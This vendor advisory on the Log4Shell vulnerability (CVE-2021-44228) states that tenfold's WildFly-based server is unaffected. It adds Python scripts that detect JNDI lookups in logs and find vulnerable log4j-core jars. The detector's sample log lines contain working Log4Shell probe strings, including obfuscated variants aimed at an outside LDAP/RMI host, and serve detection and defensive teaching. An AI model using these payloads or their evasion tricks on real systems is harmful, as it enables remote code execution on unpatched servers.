Security Update: Impact of CVE-2021-44228 on tenfold products

What is CVE-2021-44228?

On 9 December 2021 CVE-2021-44228, a zero-day vulnerability in the Apache Log4j 2 logging library known as Log4Shell, was published. Log4j 2 evaluates lookup expressions of the form “${...}” inside log messages, including attacker-controlled strings that end up in logs such as HTTP headers (User-Agent), usernames or form fields. A JNDI lookup such as “${jndi:ldap://attacker-host/x}” makes the logging library connect to the named server, and the object it returns can cause the JVM to load and execute attacker-supplied code. No authentication is required; the attacker only needs to get the string logged. The first proof of concept exploiting the vulnerability was published on 9 December 2021, and large-scale scanning for the vulnerability has since been observed in the wild.
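Scanning attempts show up in web server logs as JNDI lookup strings in attacker-controlled fields, usually obfuscated with nested lookups so that a naive search for “${jndi:” misses them. The following is an added detection example in Python; it is not code from tenfold or the Log4j project. The access-log lines are constructed for the demonstration, and the de-obfuscation step resolves the ${lower:…}, ${upper:…} and ${…:-…} default-value nestings that were commonly used in the wild.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in log lines.

Added example, not code from tenfold or the Log4j project. The access-log lines
in SAMPLE_LOG are constructed for the demonstration.
"""
import re
import sys
from typing import List, Optional, Tuple

# Lookups that only obfuscate a literal: ${lower:j} -> j, ${upper:j} -> J,
# ${::-j} -> j, ${env:NOPE:-j} -> j (the default value of a lookup that fails).
# Case changes are irrelevant because the result is lower-cased at the end.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# After normalisation a payload reads ${jndi:<scheme>:...}. Log4j matches the
# lookup prefix case-insensitively, so the whole line is lower-cased first.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:")

# Constructed sample: one benign request, then four probe variants seen in the wild.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:04 +0000] "GET /?x=${${lower:j}ndi:rmi://203.0.113.7/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:10:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:10:12:06 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/d}"',
]


def normalize(s: str) -> str:
    """Resolve nested obfuscation lookups innermost-first until nothing changes."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        s = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), s)
    return s.lower()


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, ldaps, rmi, dns, ...) if the line carries a lookup, else None."""
    m = _JNDI.search(normalize(line))
    return m.group(1) if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, scheme) for every line that contains a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


if __name__ == "__main__":
    # Usage: python detect_log4shell.py access.log   (falls back to the constructed sample)
    lines = open(sys.argv[1], errors="replace").read().splitlines() if len(sys.argv) > 1 else SAMPLE_LOG
    for idx, scheme in scan(lines):
        print(f"line {idx}: jndi/{scheme}: {normalize(lines[idx])}")
```

Run it against an access log and review every hit: a hit proves only that someone sent the string, not that a vulnerable logger processed it, so correlate with outbound LDAP/RMI/DNS connections from the application host to the named server.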

Affected log4j versions

Log4j 2 versions 2.0-beta9 through 2.14.1 are affected by CVE-2021-44228. Version 2.15.0 disables message lookups by default, which removes this attack path. Two caveats for practitioners: Log4j 1.x does not contain the JNDI lookup and is not affected by this particular CVE, and the 2.15.0 fix was later found to be incomplete (CVE-2021-45046), so upgrade to the latest 2.x release rather than stopping at 2.15.0. Where an upgrade is not immediately possible, removing the JndiLookup class from the log4j-core jar is the workaround documented by the Apache Logging project.

Impact on tenfold products

The latest impact analysis by our security experts indicates that tenfold Application Server is not affected by the vulnerability.

tenfold is built on top of WildFly Application Server and uses the jboss-logmanager facility for application logging. This component does not depend on the org.apache.logging.log4j:log4j-core library, the artifact that contains the vulnerable JNDI lookup, and is therefore not affected by CVE-2021-44228 (see the official statement).
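To confirm on your own servers which Log4j artifacts are actually present, whether in an application server's module directory, in deployed WARs and EARs that bundle their own logging library, or anywhere else on disk, here is an added Python check that is not code from tenfold, WildFly or the Log4j project. It walks a directory, recognises log4j-core jars by their class layout rather than by file name (so renamed or shaded jars are caught), reads the version from the manifest with the file name as fallback, and reports whether the version falls in the affected range and whether JndiLookup.class is still present. The jars it builds in a temporary directory are constructed stand-ins for the demonstration; point scan_tree() at a real path in practice.

```python
"""Find log4j-core jars under a directory and classify them for CVE-2021-44228.

Added example, not code from tenfold, WildFly or the Log4j project. It builds
constructed sample jars in a temporary directory so it runs offline; in practice
call scan_tree() on a real path such as a WildFly modules/ or deployments/ dir.
"""
import os
import re
import sys
import tempfile
import zipfile
from typing import List, Optional, Tuple

LOG4J_CORE_PKG = "org/apache/logging/log4j/core/"
# The class implementing the ${jndi:...} lookup; removing it from log4j-core is the
# Apache-documented workaround for installations that cannot upgrade immediately.
JNDI_CLASS = LOG4J_CORE_PKG + "lookup/JndiLookup.class"
FIXED_VERSION = "2.15.0"  # message lookups disabled by default from this release on


def version_key(v: str) -> Tuple[int, ...]:
    """Sortable key: '2.14.1' -> (2, 14, 1, 0); '2.0-beta9' -> (2, 0, 0, -1, 9).

    Pre-releases (beta/rc) sort below the corresponding final release.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(?:beta|rc)(\d+))?", v)
    if not m:
        raise ValueError(f"unparseable log4j version: {v!r}")
    major, minor, patch, pre = m.groups()
    key = (int(major), int(minor), int(patch or 0))
    return key + ((-1, int(pre)) if pre else (0,))


def detect_version(manifest: str, file_name: str) -> Optional[str]:
    """Prefer the manifest's Implementation-Version; fall back to a log4j-core-X.Y.Z.jar file name."""
    m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.MULTILINE)
    if m:
        return m.group(1)
    m = re.match(r"log4j-core-(\d+\.\d+(?:\.\d+)?(?:-(?:beta|rc)\d+)?)", file_name)
    return m.group(1) if m else None


def assess(jar_path: str) -> Optional[dict]:
    """Classify one jar; returns None if it does not contain log4j-core classes."""
    with zipfile.ZipFile(jar_path) as z:
        names = set(z.namelist())
        # log4j 1.x lives under org/apache/log4j/ and is out of scope for this CVE.
        if not any(n.startswith(LOG4J_CORE_PKG) for n in names):
            return None
        try:
            manifest = z.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        except KeyError:
            manifest = ""
    version = detect_version(manifest, os.path.basename(jar_path))
    jndi_present = JNDI_CLASS in names
    if not jndi_present:
        status = "not affected (JndiLookup.class removed)"
    elif version is None:
        status = "review manually (version unknown, JndiLookup.class present)"
    elif version_key(version) < version_key(FIXED_VERSION):
        status = "AFFECTED by CVE-2021-44228"
    else:
        status = "not affected by CVE-2021-44228 (check later Log4j advisories)"
    return {"jar": jar_path, "version": version, "jndi_lookup_class": jndi_present, "status": status}


def scan_tree(root: str) -> List[dict]:
    """Assess every .jar under root. Jars nested inside WAR/EAR archives are not opened."""
    results = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            path = os.path.join(dirpath, f)
            if f.endswith(".jar") and zipfile.is_zipfile(path):
                r = assess(path)
                if r:
                    results.append(r)
    return sorted(results, key=lambda r: r["jar"])


def _make_jar(path: str, version: str, jndi_class: bool = True, manifest: bool = True) -> None:
    """Write a constructed stand-in jar: real entry layout, placeholder class bytes."""
    with zipfile.ZipFile(path, "w") as z:
        if manifest:
            z.writestr("META-INF/MANIFEST.MF", f"Manifest-Version: 1.0\r\nImplementation-Version: {version}\r\n")
        z.writestr(LOG4J_CORE_PKG + "LoggerContext.class", b"\xca\xfe\xba\xbe")
        if jndi_class:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def build_sample_tree() -> str:
    """Constructed sample: three named log4j-core jars plus a shaded jar with no version info."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    mods = os.path.join(root, "modules")
    os.makedirs(mods)
    _make_jar(os.path.join(mods, "log4j-core-2.14.1.jar"), "2.14.1")
    _make_jar(os.path.join(mods, "log4j-core-2.15.0.jar"), "2.15.0")
    _make_jar(os.path.join(mods, "log4j-core-2.14.1-patched.jar"), "2.14.1", jndi_class=False)
    _make_jar(os.path.join(root, "shaded-app.jar"), "2.13.3", manifest=False)  # no manifest, no version
    return root


if __name__ == "__main__":
    # Usage: python scan_log4j.py /opt/wildfly   (falls back to the constructed sample tree)
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree()
    for r in scan_tree(target):
        print(f"{r['status']:<62} {r['version'] or '?':<10} {r['jar']}")
```

The "review manually" result matters in practice: a shaded or repackaged jar carries no version in its manifest, so the presence of JndiLookup.class is the only signal and must be resolved by hand. Extend scan_tree() to open WAR/EAR files if your deployments bundle their logging libraries inside them.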

Next Steps

Our security experts will continue to monitor the situation and react if necessary. We recommend always upgrading to the latest software version to protect your environment effectively from security incidents.

If you have any questions regarding this statement, feel free to contact us at support@tenfold-security.com

About the Author: Helmut Semmelmayer

As VP of Revenue Operations, Helmut Semmelmayer heads up marketing and channel sales at tenfold Software. A veteran with more than 15 years of experience in Identity & Access Management, Helmut uses our blog to share his in-depth knowledge of industry best practices and the technical foundations underpinning the administration of IT privileges.